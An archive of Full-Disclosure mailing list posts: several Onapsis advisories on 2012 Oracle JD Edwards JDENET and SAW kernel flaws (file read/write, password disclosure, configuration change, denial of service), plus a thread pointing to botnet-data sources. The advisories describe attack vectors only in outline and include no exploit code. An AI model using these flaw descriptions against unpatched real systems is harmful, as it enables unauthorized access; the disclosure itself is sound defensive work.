Re: [Full-disclosure] Botnet Traffic
Hi James, I've found that using the Shadow Server network/ASN reports is very useful, depending on what analysis you are trying to do. http://www.shadowserver.org/wiki/pmwiki.php/Involve/GetReportsOnYourNetwork I.e. - Detected Botnet Command and Control servers - Infected systems (drones) - DDoS attacks (source and victim) - Scans - Clickfraud - Compromised hosts - Proxies - Spam relays - Malicious software droppers and other related information. - Compromised hosts - Proxies - Spam relays - Malicious software droppers and other related information. You could always create your own honeypot and/or partner with one of the carriers/ISP's to get live data. Thanks Derek On 24/02/2012, at 8:51 AM, James Smith wrote: Hello, Can anyone on this list provide botnet network traffic for analysis, or Ip’s which have been infected. -- Sincerely; James Smith CEO, CEH, Security Analyst Email: ja...@smithwaysecurity.com Phone: 1877-760-1953 Website: www.SmithwaySecurity.com CONFIDENTIALITY NOTICE: This communication with its contents may contain confidential and/or legally privileged information. It is solely for the use of the intended recipient(s). Unauthorized interception, review, use or disclosure is prohibited and may violate applicable laws including the Electronic Communications Privacy Act. If you are not the intended recipient, please contact the sender and destroy all copies of the communication. - This communication is confidential to the parties it was intended to serve - ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Onapsis Security Advisory 2012-02] Oracle JD Edwards Security Kernel Remote Password Disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory: Oracle JD Edwards Security Kernel Remote Password Disclosure This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well asexclusive access to special promotions for upcoming trainings and conferences. 1. Impact on Business = By exploiting this vulnerability, a remote unauthenticated attacker might be able to access or modify all the business information processed by the ERP system. This would result in the total compromise of the ERP infrastructure. 2. Advisory Information === - --Release Date: 2012-02-23 - --Last Revised: 2012-02-21 - --Security Advisory ID: ONAPSIS-2012-02 - --Onapsis SVS ID: ONAPSIS-00026 - --Researcher: Juan Pablo Perez Etchegoyen - --CVE: CVE-2011-2325 - --Initial Base CVSS v2: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 3. Vulnerability Information - --Vendor: ORACLE - -- Affected Components: JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98 ( older versions might be also affected) - --Vulnerability Class: Information Disclosure. - --Remotely Exploitable: Yes - --Locally Exploitable: No - --Authentication Required: No - --Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2012-02 4. Affected Components Description == JDENet is a network communication middleware that performs network communications workstation-to- server and server-to-server. It is used to call remote functions, to autenticate users and transmit information between hosts in a JDEdwards environment. 5. Vulnerability Details If a specially crafted packet is sent to the JDENet Service (6015 TCP by default), and the Security Kernel is enabled and SignonSecurity is configured, then it is possible to retrieve the password of arbitrary users. Further technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 6. Solution === Apply Oracle Critical Patch update January – 2012. More information available on http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html Onapsis strongly recommends Oracle customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline = * 2010-09-20: Onapsis provides vulnerability information to Oracle. * 2010-09-21: Oracle confirms reception of vulnerability submission. * 2010-09-24: Oracle states vulnerability is under investigation. * 2010-10-07: Oracle confirms vulnerability. * 2012-01-17: Oracle releases fixes in CPU. * 2012-02-23: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of ERP systems and business-critical infrastructure. With that objective in mind, a special unit – the Onapsis Research Labs – has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis, Inc. === Onapsis provides innovative security software solutions to protect ERP systems from cyber-attacks. Through unmatched ERP security, compliance and continuous monitoring products, Onapsis secures the business-critical infrastructure of its global customers against espionage, sabotage and financial fraud threats. Onapsis X1, the company's flagship product, is the industry's first comprehensive solution for the automated security assessment of SAP platforms. Being the first and only SAP-certified solution of its kind, Onapsis X1 allows customers to perform automated Vulnerability Assessments, Security & Compliance Audits and Penetration Tests over their entire SAP platform. Onapsis is backed by the Onapsis Research Labs, a world-renowned team of SAP & ERP security experts who
[Full-disclosure] [Onapsis Security Advisory 2012-01] Oracle JD Edwards JDENET Arbitrary File Write
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory: Oracle JD Edwards JDENET Arbitrary File Write This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well asexclusive access to special promotions for upcoming trainings and conferences. 1. Impact on Business = By exploiting this vulnerability, a remote unauthenticated attacker might be able to access or modify all the business information processed by the ERP system. This would result in the total compromise of the ERP infrastructure. 2. Advisory Information === - --Release Date: 2012-02-23 - --Last Revised: 2012-02-21 - --Security Advisory ID: ONAPSIS-2012-01 - --Onapsis SVS ID: ONAPSIS-00017 - --Researcher: Juan Pablo Perez Etchegoyen - --CVE: CVE-2011-2317 - --Initial Base CVSS v2: 9.7 (AV:N/AC:L/Au:N/C:P/I:C/A:C) 3. Vulnerability Information - --Vendor: ORACLE - --Affected Components: JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98 ( older versions might be also affected) - --Vulnerability Class: Arbitrary File Write. - --Remotely Exploitable: Yes - --Locally Exploitable: No - --Authentication Required: No - --Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2012-01 4. Affected Components Description == JDENet is a network communication middleware that performs network communications workstation-to- server and server-to-server. It is used to call remote functions, to authenticate users and transmit information between hosts in a JDEdwards environment. 5. Vulnerability Details If a “Message packet” is sent to the JDENet port (6015 by default) containing a specially crafted “File Packet”, the sent file is saved in the server where the JDENet service is running, in the arbitrary location specified by the “File Packet”. Further technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 6. Solution === Apply Oracle Critical Patch update January – 2012. More information available on http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html Onapsis strongly recommends Oracle customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == * 2010-09-20: Onapsis provides vulnerability information to Oracle. * 2010-09-21: Oracle confirms reception of vulnerability submission. * 2010-09-24: Oracle states vulnerability is under investigation. * 2010-10-07: Oracle confirms vulnerability. * 2012-01-17: Oracle releases fixes in CPU. * 2012-02-23: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of ERP systems and business-critical infrastructure. With that objective in mind, a special unit – the Onapsis Research Labs – has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis, Inc. === Onapsis provides innovative security software solutions to protect ERP systems from cyber-attacks. Through unmatched ERP security, compliance and continuous monitoring products, Onapsis secures the business-critical infrastructure of its global customers against espionage, sabotage and financial fraud threats. Onapsis X1, the company's flagship product, is the industry's first comprehensive solution for the automated security assessment of SAP platforms. Being the first and only SAP-certified solution of its kind, Onapsis X1 allows customers to perform automated Vulnerability Assessments, Security & Compliance Audits and Penetration Tests over their entire SAP platform. Onapsis is backed by the Onapsis Research Labs, a world-renowned team of SAP & ERP security
[Full-disclosure] [Onapsis Security Advisory 2012-08] Oracle JD Edwards Security Kernel Information Disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory: Oracle JD Edwards Security Kernel Information Disclosure This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well as exclusive access to special promotions for upcoming trainings and conferences. 1. Impact on Business = By exploiting this vulnerability, a remote unauthenticated attacker might be able to validate user credentials to access the ERP system. This would represent valuable information to perform more complex attack to the ERP system. 2. Advisory Information === - --Release Date: 2012-02-23 - --Last Revised: 2012-02-21 - --Security Advisory ID: ONAPSIS-2012-08 - --Onapsis SVS ID: ONAPSIS-00027 - --Researcher: Juan Pablo Perez Etchegoyen - --CVE: CVE-2011-2326 - --Initial Base CVSS v2: 3.9 (AV:N/AC:L/Au:N/C:P/I:N/A:N/CDP:ND/TD:ND/CR:L/IR:ND/AR:ND) 3. Vulnerability Information - --Vendor: ORACLE - --Affected Components: JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98 ( older versions might be also affected) - --Vulnerability Class: Information Disclosure. - --Remotely Exploitable: Yes - --Locally Exploitable: No - --Authentication Required: No - --Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2012-08 4. Affected Components Description == JDENet is a network communication middleware that performs network communications workstation-to- server and server-to-server. It is used to call remote functions, to authenticate users and transmit information between hosts in a JDEdwards environment. 5. Vulnerability Details If a specially crafted packet is sent to the JDENet Service (6015 TCP by default), then it would be possible to validate arbitrary (USER, ROLE, ENVIRONMENT) tuples, in order to detect valid ones. Further technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 6. Solution === Apply Oracle Critical Patch update January – 2012. More information available on http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html Onapsis strongly recommends Oracle customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == * 2010-09-20: Onapsis provides vulnerability information to Oracle. * 2010-09-21: Oracle confirms reception of vulnerability submission. * 2010-09-24: Oracle states vulnerability is under investigation. * 2010-10-07: Oracle confirms vulnerability. * 2012-01-17: Oracle releases fixes in CPU. * 2012-02-23: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of ERP systems and business-critical infrastructure. With that objective in mind, a special unit – the Onapsis Research Labs – has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis, Inc. === Onapsis provides innovative security software solutions to protect ERP systems from cyber-attacks. Through unmatched ERP security, compliance and continuous monitoring products, Onapsis secures the business-critical infrastructure of its global customers against espionage, sabotage and financial fraud threats. Onapsis X1, the company's flagship product, is the industry's first comprehensive solution for the automated security assessment of SAP platforms. Being the first and only SAP-certified solution of its kind, Onapsis X1 allows customers to perform automated Vulnerability Assessments, Security & Compliance Audits and Penetration Tests over their entire SAP platform. Onapsis is backed by the Onapsis Research Labs, a world-renowned team of SAP & ERP security ex
[Full-disclosure] [Onapsis Security Advisory 2012-07] Oracle JD Edwards SawKernel SET_INI Configuration Modification
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory: Oracle JD Edwards SawKernel SET_INI Configuration Modification This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well as exclusive access to special promotions for upcoming trainings and conferences. 1. Impact on Business = By exploiting this vulnerability, a remote unauthenticated attacker might be able to access or modify all the business information processed by the ERP system. This would result in the total compromise of the ERP infrastructure. 2. Advisory Information === - --Release Date: 2012-02-23 - --Last Revised: 2012-02-21 - --Security Advisory ID: ONAPSIS-2012-07 - --Onapsis SVS ID: ONAPSIS-00032 - --Researcher: Juan Pablo Perez Etchegoyen - --CVE: CVE-2011-3514 - --Initial Base CVSS v2: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 3. Vulnerability Information - --Vendor: ORACLE - --Affected Components: - --JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98 ( older versions might be also affected) Vulnerability Class: Configuration Modification. - --Remotely Exploitable: Yes - --Locally Exploitable: No - --Authentication Required: No - --Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2012-07 4. Affected Components Description == “The next kernel in the JDE.INI file is the Server Administration Workbench (SAW) kernel. This kernel is responsible for collecting and reporting information about the kernels in EnterpriseOne. The SAW kernel will connect to each of the kernels to determine information including: - Number of users connected to the kernel (if applicable) - Number of requests processes by the kernel - Average time to complete the request - Outstanding requests - Users connected to the kernel process (if applicable) This information is displayed in the SAW or Server Manager applications. This is critical to monitoring the health of the EnterpriseOne kernels and providing a view into how the system is executing .” JD Edwards EnterpriseOne. The complete reference. - Copyright © 2009 by The McGraw-Hill Companies 5. Vulnerability Details If a specially crafted message is sent to the JDENET service (specifically to the SAW Kernel), a user can remotely change the JDE.INI configuration file. This situation might help the attacker to perform complex attacks that would lead in a full compromise of the system. Further technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 6. Solution === Apply Oracle Critical Patch update January – 2012. More information available on http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html Onapsis strongly recommends Oracle customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == * 2010-09-20: Onapsis provides vulnerability information to Oracle. * 2010-09-21: Oracle confirms reception of vulnerability submission. * 2010-09-24: Oracle states vulnerability is under investigation. * 2010-10-07: Oracle confirms vulnerability. * 2012-01-17: Oracle releases fixes in CPU. * 2012-02-23: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of ERP systems and business-critical infrastructure. With that objective in mind, a special unit – the Onapsis Research Labs – has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis, Inc. === Onapsis provides innovative security software solutions to protect ERP systems from cyber-attacks. Through unmatched ERP securit
[Full-disclosure] [Onapsis Security Advisory 2012-06] Oracle JD Edwards JDENET Large Packets Denial of Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory: Oracle JD Edwards JDENET Large Packets Denial of Service This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well as exclusive access to special promotions for upcoming trainings and conferences. 1. Impact on Business = By exploiting this vulnerability, a remote unauthenticated attacker might trigger a denial of service on the JDENET service. This would result in the unavailability of most of the ERP services. 2. Advisory Information === - --Release Date: 2012-02-23 - --Last Revised: 2012-02-21 - --Security Advisory ID: ONAPSIS-2012-06 - --Onapsis SVS ID: ONAPSIS-00023 - --Researcher: Juan Pablo Perez Etchegoyen - --CVE: CVE-2011-2324 - --Initial Base CVSS v2: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 3. Vulnerability Information - --Vendor: ORACLE - --Affected Components: - --JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98 ( older versions might be also affected) - --Vulnerability Class: Denial of Service. - --Remotely Exploitable: Yes - --Locally Exploitable: No - --Authentication Required: No - --Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2012-06 4. Affected Components Description == JDENet is a network communication middleware that performs network communications workstation-to- server and server-to-server. It is used to call remote functions, to autenticate users and transmit information between hosts in a JDEdwards environment. 5. Vulnerability Details If a message containing packets of a specific size is sent to the JDENET service, a Denial of service condition is triggered, because the kernel in charge of dispatching those packets uses all the available CPU time. Further technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 6. Solution === Apply Oracle Critical Patch update January – 2012. More information available on http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html Onapsis strongly recommends Oracle customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == * 2010-09-20: Onapsis provides vulnerability information to Oracle. * 2010-09-21: Oracle confirms reception of vulnerability submission. * 2010-09-24: Oracle states vulnerability is under investigation. * 2010-10-07: Oracle confirms vulnerability. * 2012-01-17: Oracle releases fixes in CPU. * 2012-02-23: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of ERP systems and business-critical infrastructure. With that objective in mind, a special unit – the Onapsis Research Labs – has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis, Inc. === Onapsis provides innovative security software solutions to protect ERP systems from cyber-attacks. Through unmatched ERP security, compliance and continuous monitoring products, Onapsis secures the business-critical infrastructure of its global customers against espionage, sabotage and financial fraud threats. Onapsis X1, the company's flagship product, is the industry's first comprehensive solution for the automated security assessment of SAP platforms. Being the first and only SAP-certified solution of its kind, Onapsis X1 allows customers to perform automated Vulnerability Assessments, Security & Compliance Audits and Penetration Tests over their entire SAP platform. Onapsis is backed by the Onapsis Research Labs, a world-renowned team of SAP & ERP security experts who are continuously invited to lecture at the lead
[Full-disclosure] [Onapsis Security Advisory 2012-05] Oracle JD Edwards JDENET Multiple Information Disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory: Oracle JD Edwards JDENET Multiple Information Disclosure This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well as exclusive access to special promotions for upcoming trainings and conferences. 1. Impact on Business = By exploiting this vulnerability, a remote unauthenticated attacker might be able to access technical information of the ERP system This might result in the disclosure of technical information that might be useful in further attacks to the ERP infrastructure. 2. Advisory Information === - --Release Date: 2012-02-23 - --Last Revised: 2012-02-21 - --Security Advisory ID: ONAPSIS-2012-05 - --Onapsis SVS ID: ONAPSIS-00021 - --Researcher: Juan Pablo Perez Etchegoyen - --CVE: CVE-2011-2321 - --Initial Base CVSS v2: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 3. Vulnerability Information - --Vendor: ORACLE - --Affected Components: JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98 ( older versions might be also affected) - --Vulnerability Class: Information Disclosure. - --Remotely Exploitable: Yes - --Locally Exploitable: No - --Authentication Required: No - --Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2012-05 4. Affected Components Description == JDENet is a network communication middleware that performs network communications workstation-to- server and server-to-server. It is used to call remote functions, to authenticate users and transmit information between hosts in a JDEdwards environment. 5. Vulnerability Details Several ways to gather information exist in the JDENET service. Sending specific types of messages, it is possible to access technical information about the system's configuration, such as: * Kernel Process ID. * Kernel processes. * Kernel processes information. * JDNET process information. Further technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 6. Solution === Apply Oracle Critical Patch update January – 2012. More information available on http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html Onapsis strongly recommends Oracle customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == * 2010-09-20: Onapsis provides vulnerability information to Oracle. * 2010-09-21: Oracle confirms reception of vulnerability submission. * 2010-09-24: Oracle states vulnerability is under investigation. * 2010-10-07: Oracle confirms vulnerability. * 2012-01-17: Oracle releases fixes in CPU. * 2012-02-23: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of ERP systems and business-critical infrastructure. With that objective in mind, a special unit – the Onapsis Research Labs – has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis, Inc. === Onapsis provides innovative security software solutions to protect ERP systems from cyber-attacks. Through unmatched ERP security, compliance and continuous monitoring products, Onapsis secures the business-critical infrastructure of its global customers against espionage, sabotage and financial fraud threats. Onapsis X1, the company's flagship product, is the industry's first comprehensive solution for the automated security assessment of SAP platforms. Being the first and only SAP-certified solution of its kind, Onapsis X1 allows customers to perform automated Vulnerability Assessments, Security & Compliance Audits and Penetration T
[Full-disclosure] [Onapsis Security Advisory 2012-04] Oracle JD Edwards SawKernel GET_INI Information Disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory: Oracle JD Edwards SawKernel GET_INI Information Disclosure This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well as exclusive access to special promotions for upcoming trainings and conferences. 1. Impact on Business = By exploiting this vulnerability, a remote unauthenticated attacker might be able to access or modify all the business information processed by the ERP system. This would result in the total compromise of the ERP infrastructure. 2. Advisory Information === - --Release Date: 2012-02-23 - --Last Revised: 2012-02-21 - --Security Advisory ID: ONAPSIS-2012-04 - --Onapsis SVS ID: ONAPSIS-00033 - --Researcher: Juan Pablo Perez Etchegoyen - --CVE: CVE-2011-3524 - --Initial Base CVSS v2: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 3. Vulnerability Information - --Vendor: ORACLE - --Affected Components: JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98 ( older versions might be also affected) - --Vulnerability Class: Information Disclosure. - --Remotely Exploitable: Yes - --Locally Exploitable: No - --Authentication Required: No - --Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2012-04 4. Affected Components Description == “The next kernel in the JDE.INI file is the Server Administration Workbench (SAW) kernel. This kernel is responsible for collecting and reporting information about the kernels in EnterpriseOne. The SAW kernel will connect to each of the kernels to determine information including: - Number of users connected to the kernel (if applicable) - Number of requests processes by the kernel - Average time to complete the request - Outstanding requests - Users connected to the kernel process (if applicable) This information is displayed in the SAW or Server Manager applications. This is critical to monitoring the health of the EnterpriseOne kernels and providing a view into how the system is executing .” JD Edwards EnterpriseOne. The complete reference. - Copyright © 2009 by The McGraw-Hill Companies 5. Vulnerability Details If a specially crafted message is sent to the JDENET service (specifically to the SAW Kernel), a user can remotely retrieve data from the JDE.INI configuration FILE. This information includes password for database connection and configuration of node password for authentication tokens. Further technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 6. Solution === Apply Oracle Critical Patch update January – 2012. More information available on http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html Onapsis strongly recommends Oracle customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == * 2010-09-20: Onapsis provides vulnerability information to Oracle. * 2010-09-21: Oracle confirms reception of vulnerability submission. * 2010-09-24: Oracle states vulnerability is under investigation. * 2010-10-07: Oracle confirms vulnerability. * 2012-01-17: Oracle releases fixes in CPU. * 2012-02-23: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of ERP systems and business-critical infrastructure. With that objective in mind, a special unit – the Onapsis Research Labs – has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis, Inc. === Onapsis provides innovative security software solutions to protect ERP systems from cyber-attacks. Through unmatched ERP s
[Full-disclosure] [Onapsis Security Advisory 2012-03] Oracle JD Edwards SawKernel Arbitrary File Read
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory: Oracle JD Edwards SawKernel Arbitrary File Read This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well as exclusive access to special promotions for upcoming trainings and conferences. 1. Impact on Business = By exploiting this vulnerability, a remote unauthenticated attacker might be able to access arbitrary files hosted on the ERP system. This would result in the total compromise of the ERP infrastructure. 2. Advisory Information === - --Release Date: 2012-02-23 - --Last Revised: 2012-02-21 - --Security Advisory ID: ONAPSIS-2012-03 - --Onapsis SVS ID: ONAPSIS-00030 - --Researcher: Juan Pablo Perez Etchegoyen - --CVE: CVE-2011-3509 - --Initial Base CVSS v2: 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) 3. Vulnerability Information - --Vendor: ORACLE - --Affected Components: JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98 ( older versions might be also affected) - --Vulnerability Class: Information Disclosure. - --Remotely Exploitable: Yes - --Locally Exploitable: No - --Authentication Required: No - --Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2012-03 4. Affected Components Description == “The next kernel in the JDE.INI file is the Server Administration Workbench (SAW) kernel. This kernel is responsible for collecting and reporting information about the kernels in EnterpriseOne. The SAW kernel will connect to each of the kernels to determine information including: - Number of users connected to the kernel (if applicable) - Number of requests processes by the kernel - Average time to complete the request - Outstanding requests - Users connected to the kernel process (if applicable) This information is displayed in the SAW or Server Manager applications. This is critical to monitoring the health of the EnterpriseOne kernels and providing a view into how the system is executing .” JD Edwards EnterpriseOne. The complete reference. - Copyright © 2009 by The McGraw-Hill Companies 5. Vulnerability Details If a specially crafted packet is sent to the JDENet Service (6015 TCP by default), and the JDESAW Kernel is configured (it is by default), then it would be possible to read any file on the system. Further technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 6. Solution === Apply Oracle Critical Patch update January – 2012. More information available on http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html Onapsis strongly recommends Oracle customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == * 2010-09-20: Onapsis provides vulnerability information to Oracle. * 2010-09-21: Oracle confirms reception of vulnerability submission. * 2010-09-24: Oracle states vulnerability is under investigation. * 2010-10-07: Oracle confirms vulnerability. * 2012-01-17: Oracle releases fixes in CPU. * 2012-02-23: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of ERP systems and business-critical infrastructure. With that objective in mind, a special unit – the Onapsis Research Labs – has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis, Inc. === Onapsis provides innovative security software solutions to protect ERP systems from cyber-attacks. Through unmatched ERP security, compliance and continuous monitoring products, Onapsis secures the business-critical infrastructure of its global custom
Re: [Full-disclosure] Botnet Traffic
thank this is very helpful as well. -Original Message- From: Hurgel Bumpf Sent: Thursday, February 23, 2012 8:52 PM To: ja...@smithwaysecurity.com ; full-disclosure@lists.grok.org.uk Subject: AW: [Full-disclosure] Botnet Traffic check the arbor atlas for worldwide threats and sources.. http://atlas.arbor.net/ -HB -- James Smith schrieb am Do., 23. Feb 2012 17:20 EST: >Hello, > >Can anyone on this list provide botnet network traffic for analysis, or Ip’s >which have been infected. >-- >Sincerely; > > >James Smith >CEO, CEH, Security Analyst >Email: ja...@smithwaysecurity.com >Phone: 1877-760-1953 >Website: www.SmithwaySecurity.com > > >CONFIDENTIALITY NOTICE: This communication with its contents may contain >confidential and/or legally privileged information. It is solely for the >use of the intended recipient(s). Unauthorized interception, review, use or >disclosure is prohibited and may violate applicable laws including the >Electronic Communications Privacy Act. If you are not the intended >recipient, please contact the sender and destroy all copies of the >communication. > >- This communication is confidential to the parties it was intended to >serve - ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Botnet Traffic
